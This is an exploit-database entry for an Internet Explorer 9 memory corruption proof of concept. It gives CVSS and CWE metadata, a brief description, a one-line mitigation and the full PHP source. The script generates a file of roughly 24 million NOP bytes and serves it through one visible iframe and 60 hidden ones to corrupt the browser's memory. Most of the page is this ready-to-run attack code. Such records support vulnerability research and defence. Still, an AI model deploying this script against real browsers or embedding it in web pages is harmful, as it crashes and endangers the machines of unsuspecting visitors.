header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Jean Pascal Pereira
7,6
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Internet Explorer
Affected Version From: IE9
Affected Version To: IE9
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer:9.0.8112.16421
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

Internet Explorer 9 Memory Corruption PoC Exploit

This PoC exploit successfully executes with IE9 version 9.0.8112.16421 and is discovered by Jean Pascal Pereira. The exploit creates a junk.htm file with a string of 24117256 NOP instructions and an iframe with the junk.htm file. The exploit also creates 60 hidden iframes with the junk.htm file.

Mitigation:

Disable ActiveX controls and scripting in Internet Explorer, use a different browser, or use a virtual machine.
Source

Exploit-DB raw data:

<?php

/**********************************************************
 *   Internet Explorer 9 Memory Corruption PoC Exploit    *
 **********************************************************
 *                                                        *
 * Successfully executed with IE9 version 9.0.8112.16421  *
 *                                                        *
 * Discovered by Jean Pascal Pereira <pereira@secbiz.de>  *
 *                                                        *
 **********************************************************/

set_time_limit(0);

ini_set('memory_limit', '300M'); 

if(!file_exists("junk.htm"))
{
  $string = "<span id='";
  
  for($i = 0; $i < 24117256; $i++)
  {
    $string .= "\x90";
  }
  $string .= "'></span>";
  
  file_put_contents("junk.htm", $string);
}

print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
print "<iframe style='width: 800px; height: 500px;' src='junk.htm'>\n";

for($i = 0; $i < 60; $i++)
{
  print "<iframe style='display:none' src='junk.htm'>\n";
} 

/* http://0xffe4.org */

?>

Navigation

Suggest Exploit

Services By CQR